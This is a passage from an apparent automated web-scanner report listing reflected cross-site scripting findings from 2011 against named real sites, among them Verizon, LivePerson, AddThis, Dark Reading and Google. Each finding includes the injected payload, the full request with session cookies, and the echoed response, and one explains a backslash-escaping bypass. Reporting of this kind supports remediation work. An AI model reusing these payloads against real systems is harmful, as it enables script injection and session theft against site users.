This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /meta?_o=15772&_t=ghp&ssv_random=27&ssv_callback=SetXP1Placementsdb97b<script>alert(1)</script>2c290befa45&ssv_003=&ssv_004=&ssv_005=&ssv_006=&ssv_007=&ssv_008=&ssv_009=&ssv_010=&ssv_011=&ssv_012=0&ssv_013=0&ssv_014=807&ssv_015=&ssv_016= HTTP/1.1
Host: s.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Cookie: X1ID=BO-00000000521444319; O1807966=768; P1807966=c3N2X2MzfFl8MTMxMjc2OTY3N3xzc3ZfYnxjM3wxMzEyNzY5Njc3fHNzdl8xfDI4NTQ0NTM5OHwxMzEyNzY5Njc3fA==; M62795-97956=1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:15:15 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1621610-B22941263=0|0|0|0|0|22946267|22946266|-1; domain=.ru4.com; path=/
Set-cookie: P15772=; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Content-type: text/html
Content-length: 1535
X-Cnection: close

SetXP1Placementsdb97b<script>alert(1)</script>2c290befa45({
"xp1_placement1": {
"creativeID": "GHP_OT_HSIDL3M_DEF",
"clickURL": "http://s.xp1.ru4.com/click?_o=15772&_n=62795&_c=1621610&_x=17344902&_b=17344904&_d=17345346&_g=173453
...[SNIP]...

2.15. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload d227a%0acf71731e6ad was submitted in the site parameter. This input was echoed as d227a
cf71731e6ad
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=2329305d227a%0acf71731e6ad&d_id=undefined HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315261001562

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:17:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2140
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSQCSDTSC=FKAPLFPBAEMCBLJIOBGFJFDD; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 2329305d227a
cf71731e6ad

lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

2.16. http://search.verizon.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.verizon.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e51d"><script>alert(1)</script>84948b9fe2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tp=l&rv=l&q=xss&search.x=0&search.y=0&9e51d"><script>alert(1)</script>84948b9fe2a=1 HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=xss%20sq~~~~

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:18:54 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 50777


                   <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" type="text/css" href="https://www22.verizon.com/in
...[SNIP]...
<a href="http://search.verizon.com/?9e51d"><script>alert(1)</script>84948b9fe2a=1&market=94531+zz+CA&q=sss&rv=l&search.x=0&search.y=0&st=CA&tp=l&u1=q" style="font-weight: bold;">
...[SNIP]...

2.17. https://signin.verizon.com/sso/VOLPortalLogin [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://signin.verizon.com
Path:   /sso/VOLPortalLogin

Issue detail

The value of the goto request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86b63"><script>alert(1)</script>b4d89556348 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sso/VOLPortalLogin?loginType=dotcom&module=AIAW&generic=true&app=myvz2&goto=https%253a%252f%252fsignin.verizon.com%252fsso%252fProcessLoginServlet%253ftarget%253dhttps%25253a%25252f%25252fwww22.verizon.com%25252fforyourhome%25252fMyAccount%25252fProtected%25252fCommon%25252fergcon.aspx%25253fTarget%25253d86b63"><script>alert(1)</script>b4d89556348 HTTP/1.1
Host: signin.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; VZSSOCOM_SESSIONID=3G0bTlLf1jTwG4vn19Q6hKvqw4QjypJ4qhDWfmfDPR62TbVp8RjL!419329926!559599265; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:42:52 GMT
Server: Apache
Content-Length: 621
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1


<html>

<body>

<form name="loginPoster" method="post" target="_top">


<input type="hidden" name="postURL" value="https://signin.verizon.com/sso/RememberMeServlet?target=https%3a%2f%2fsignin.verizon.com%2fsso%2fProcessLoginServlet%3ftarget%3dhttps%253a%252f%252fwww22.verizon.com%252fforyourhome%252fMyAccount%252fProtected%252fCommon%252fergcon.aspx%253fTarget%253d86b63"><script>alert(1)</script>b4d89556348">
...[SNIP]...

2.18. http://syndicate.verizon.net/ads/js.ashx [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.verizon.net
Path:   /ads/js.ashx

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0c04\'%3balert(1)//bc1633a1cdc was submitted in the page parameter. This input was echoed as b0c04\\';alert(1)//bc1633a1cdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/js.ashx?page=business2.vz.net/out/homepageb0c04\'%3balert(1)//bc1633a1cdc&pos=Top1,x13 HTTP/1.1
Host: syndicate.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 2728
Date: Mon, 05 Sep 2011 22:35:56 GMT
Connection: close

//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008
//New changes made on 06/25 and pushed to fuat on 06/25
//configuration
OAS_url = 'http://oascentral.verizononline.com/RealMedia/ads/';
OAS_sitepage = 'business2.vz.net/out/homepageb0c04\\';alert(1)//bc1633a1cdc';
OAS_listpos = 'Top1,x13';
OAS_query = 'popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vason
...[SNIP]...

2.19. http://syndicate.verizon.net/ads/js.ashx [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.verizon.net
Path:   /ads/js.ashx

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2f22\'%3balert(1)//e8dc7888daf was submitted in the pos parameter. This input was echoed as e2f22\\';alert(1)//e8dc7888daf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/js.ashx?page=business2.vz.net/out/homepage&pos=Top1,x13e2f22\'%3balert(1)//e8dc7888daf HTTP/1.1
Host: syndicate.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 2728
Date: Mon, 05 Sep 2011 22:35:58 GMT
Connection: close

//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008
//New changes made on 06/25 and pushed to fuat on 06/25
//configuration
OAS_url = 'http://oascentral.verizononline.com/RealMedia/ads/';
OAS_sitepage = 'business2.vz.net/out/homepage';
OAS_listpos = 'Top1,x13e2f22\\';alert(1)//e8dc7888daf';
OAS_query = 'popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&vis
...[SNIP]...

2.20. http://syndicate.verizon.net/ads/scripthandler.ashx [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.verizon.net
Path:   /ads/scripthandler.ashx

Issue detail

The value of the source request parameter is copied into a JavaScript rest-of-line comment. The payload 53953%0aalert(1)//1467c73ae8e was submitted in the source parameter. This input was echoed as 53953
alert(1)//1467c73ae8e
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/scripthandler.ashx?source=business2.vz.net/out/homepage53953%0aalert(1)//1467c73ae8e HTTP/1.1
Host: syndicate.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 1167
Date: Mon, 05 Sep 2011 22:36:05 GMT
Connection: close

// using application id: business2.vz.net
// using page id: out/homepage53953
alert(1)//1467c73ae8e



           var vz_included_elements = new Array();    // remember everything we've added to the DOM
                                                   // this will redefine the existing array

           function vz_include_script( filename, defer )

...[SNIP]...

2.21. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://verizonwireless.tt.omtrdc.net
Path:   /m2/verizonwireless/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload b9ca7<script>alert(1)</script>c0a655518a0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1315278871714-190238&mboxPage=1315278871714-190238&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=853&browserTimeOffset=-300&colorDepth=16&mboxCount=3&mbox=Prospects_LeftOfferToutb9ca7<script>alert(1)</script>c0a655518a0&mboxId=0&mboxTime=1315260876061&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: verizonwireless.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 219
Date: Mon, 05 Sep 2011 22:15:22 GMT
Server: Test & Target

mboxFactories.get('default').get('Prospects_LeftOfferToutb9ca7<script>alert(1)</script>c0a655518a0',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315278871714-190238.19");

2.22. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver [nimlet parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://webmail.verizonemail.net
Path:   /webmail/servlet/HttpNimletDriver

Issue detail

The value of the nimlet request parameter is copied into the HTML document as plain text between tags. The payload 41149<script>alert(1)</script>08f450c0fce was submitted in the nimlet parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webmail/servlet/HttpNimletDriver?nimlet=LoginNimlet41149<script>alert(1)</script>08f450c0fce&site=B HTTP/1.1
Host: webmail.verizonemail.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizonemail.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Server: Sun-ONE-Application-Server/7.0.0_03c
Date: Mon, 05 Sep 2011 22:42:00 GMT
Content-length: 2462
Content-type: text/html

<html><head>
<title>
Sun ONE Application Server - HTTP Status 500 Error
</title>
<STYLE><!--
BODY{font-family : verdana, geneva, helvetica, arial, sans-serif; color : black;background-color : white;}

...[SNIP]...
<pre>javax.servlet.ServletException: The requested Nimlet( LoginNimlet41149<script>alert(1)</script>08f450c0fce) is not available
   at com.nitido.nimbox.http.HttpNimletDriver.getNimlet(Unknown Source)
   at com.nitido.nimbox.http.SkinDispatcherForNimlet.dispatch(Unknown Source)
   at com.nitido.nimbox.http.HttpNimle
...[SNIP]...

2.23. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload abfb2<script>alert(1)</script>68ca5a7c143 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpabfb2<script>alert(1)</script>68ca5a7c143 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 05 Sep 2011 22:36:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1333
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpabfb2<script>alert(1)</script>68ca5a7c143</strong>
...[SNIP]...

2.24. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ebd8"-alert(1)-"6e68519e30a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php5ebd8"-alert(1)-"6e68519e30a HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 05 Sep 2011 22:36:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1307
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php5ebd8"-alert(1)-"6e68519e30a";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.25. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdd6e"-alert(1)-"0f82dbf2642 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/bdd6e"-alert(1)-"0f82dbf2642 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92806

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/bdd6e"-alert(1)-"0f82dbf2642";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.26. http://www.darkreading.com/security/attacks/showArticle.jhtml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.darkreading.com
Path:   /security/attacks/showArticle.jhtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c396"><script>alert(1)</script>17fa94993a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /security/attacks8c396"><script>alert(1)</script>17fa94993a5/showArticle.jhtml HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=aHFlcnBxYTE5ZmU2aGVmdmF0OWFxM25vYzE%3D; expires=Mon, 05-Sep-2011 12:36:32 GMT; path=/
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equ
...[SNIP]...
tp%3A%2F%2Fwww.darkreading.com%2Fsecurity%2Fattacks8c396%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E17fa94993a5%2F0&siteId=162801002&successfulLoginRedirect=http://www.darkreading.com/security/attacks8c396"><script>alert(1)</script>17fa94993a5/0">
...[SNIP]...

2.27. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a33e8(a)f8a98d8a3f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?a33e8(a)f8a98d8a3f7=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:16 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

